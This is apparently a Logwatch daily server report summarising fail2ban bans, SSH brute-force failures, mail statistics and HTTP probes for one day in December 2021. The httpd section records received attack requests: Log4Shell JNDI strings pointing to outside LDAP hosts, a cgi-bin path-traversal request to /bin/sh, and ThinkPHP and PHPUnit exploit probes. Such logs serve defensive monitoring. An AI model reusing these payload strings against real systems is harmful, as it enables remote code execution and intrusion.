################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Fri Dec 17 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-16 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 23:23 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 9 sites probed the server 117.198.250.231 156.251.172.207 167.71.102.95 178.72.75.84 20.101.106.180 20.121.13.154 61.219.11.151 66.240.205.34 66.240.219.146 Requests with error response codes 400 Bad Request null: 17 Time(s) mstshash=Administr: 2 Time(s) mstshash=Domain: 2 Time(s) /.git/config: 1 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s) /config/getuser?index=0: 1 Time(s) /pVOG: 1 Time(s) \xB1\xC5\xDC(\xE8\x00\x00\x00\x00\x00: 1 Time(s) 404 Not Found //2018/wp-includes/wlwmanifest.xml: 1 Time(s) //2019/wp-includes/wlwmanifest.xml: 1 Time(s) //blog/wp-includes/wlwmanifest.xml: 1 Time(s) //cms/wp-includes/wlwmanifest.xml: 1 Time(s) //media/wp-includes/wlwmanifest.xml: 1 Time(s) //news/wp-includes/wlwmanifest.xml: 1 Time(s) //shop/wp-includes/wlwmanifest.xml: 1 Time(s) //site/wp-includes/wlwmanifest.xml: 1 Time(s) //sito/wp-includes/wlwmanifest.xml: 1 Time(s) //test/wp-includes/wlwmanifest.xml: 1 Time(s) //web/wp-includes/wlwmanifest.xml: 1 Time(s) //website/wp-includes/wlwmanifest.xml: 1 Time(s) //wordpress/wp-includes/wlwmanifest.xml: 1 Time(s) //wp-includes/wlwmanifest.xml: 1 Time(s) //wp/wp-includes/wlwmanifest.xml: 1 Time(s) //wp1/wp-includes/wlwmanifest.xml: 1 Time(s) //wp2/wp-includes/wlwmanifest.xml: 1 Time(s) //xmlrpc.php?rsd: 1 Time(s) 499 (undefined) /: 5 Time(s) /${jndi:ldap://31.131.16.127:1389/Exploit}: 1 Time(s) /login: 1 Time(s) 500 Internal Server Error /: 30 Time(s) /.env: 4 Time(s) /Autodiscover/Autodiscover.xml: 2 Time(s) /_ignition/execute-solution: 2 Time(s) /console/: 2 Time(s) /robots.txt: 2 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) /.git/config: 1 Time(s) /.well-known/security.txt: 1 Time(s) /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s) /favicon.ico: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /remote/login?lang=en: 1 Time(s) /sitemap.xml: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (159.75.216.168): 37 Time(s) root (212.64.91.71): 34 Time(s) root (61.160.251.98): 20 Time(s) root (223.99.170.130): 18 Time(s) unknown (212.64.91.71): 16 Time(s) root (106.13.27.134): 15 Time(s) unknown (61.160.251.98): 15 Time(s) unknown (159.75.216.168): 13 Time(s) root (ns3152155.ip-151-106-38.eu): 12 Time(s) unknown (ns3152155.ip-151-106-38.eu): 10 Time(s) root (96.78.175.36): 9 Time(s) root (164.90.217.133): 7 Time(s) unknown (106.13.27.134): 7 Time(s) root (161.35.205.46): 6 Time(s) root (177.249.43.20): 6 Time(s) root (175.209.89.234): 5 Time(s) unknown (164.90.217.133): 5 Time(s) unknown (96.78.175.36): 5 Time(s) root (117.66.243.77): 4 Time(s) root (45.124.144.116): 3 Time(s) unknown (223.99.170.130): 3 Time(s) unknown (114.30.126.78.rev.sfr.net): 2 Time(s) unknown (117.89.142.214): 2 Time(s) unknown (161.35.205.46): 2 Time(s) unknown (195.141.53.65): 2 Time(s) unknown (65.212.254.95): 2 Time(s) unknown (c193-183-241-159.customer.sandnet.se): 2 Time(s) mysql (164.90.217.133): 1 Time(s) news (180.250.248.169): 1 Time(s) root (36.110.142.212): 1 Time(s) root (oc-144-21-87-42.compute.oraclecloud.com): 1 Time(s) unknown (117.66.243.77): 1 Time(s) unknown (141.98.10.202): 1 Time(s) unknown (175.209.89.234): 1 Time(s) unknown (45.124.144.116): 1 Time(s) unknown (45.141.84.10): 1 Time(s) Invalid Users: Unknown Account: 91 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 2 Miscellaneous warnings 8.896K Bytes accepted 9,109 8.896K Bytes sent via SMTP 9,109 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 2 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 2 Total 4xx Rejects 100.00% ======== ================================================== 26 Connections 14 Connections lost (inbound) 26 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Timeouts (inbound) 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 36.110.142.212: 1 time 45.124.144.116: 3 times 61.160.251.98: 20 times 96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 9 times 106.13.27.134: 15 times 117.66.243.77: 4 times 144.21.87.42 (oc-144-21-87-42.compute.oraclecloud.com): 1 time 151.106.38.100 (ns3152155.ip-151-106-38.eu): 12 times 159.75.216.168: 37 times 161.35.205.46: 6 times 164.90.217.133: 8 times 175.209.89.234: 5 times 177.249.43.20 (177.249.43.20-clientes-zap-izzi.mx): 6 times 180.250.248.169: 1 time 212.64.91.71: 34 times 223.99.170.130: 18 times Illegal users from: 2001:470:1:332::8: 1 time undef: 61 times 45.124.144.116: 1 time 45.141.84.10: 1 time 61.160.251.98: 15 times 64.62.197.152: 1 time 65.212.254.95: 2 times 78.126.30.114 (114.30.126.78.rev.sfr.net): 2 times 96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 5 times 106.13.27.134: 7 times 117.66.243.77: 1 time 117.89.142.214: 2 times 141.98.10.202: 1 time 151.106.38.100 (ns3152155.ip-151-106-38.eu): 10 times 159.75.216.168: 13 times 161.35.205.46: 2 times 164.90.217.133: 5 times 175.209.89.234: 1 time 178.73.215.171 (178-73-215-171-static.glesys.net): 1 time 193.183.241.159 (c193-183-241-159.customer.sandnet.se): 2 times 195.141.53.65: 2 times 212.64.91.71: 16 times 223.99.170.130: 3 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################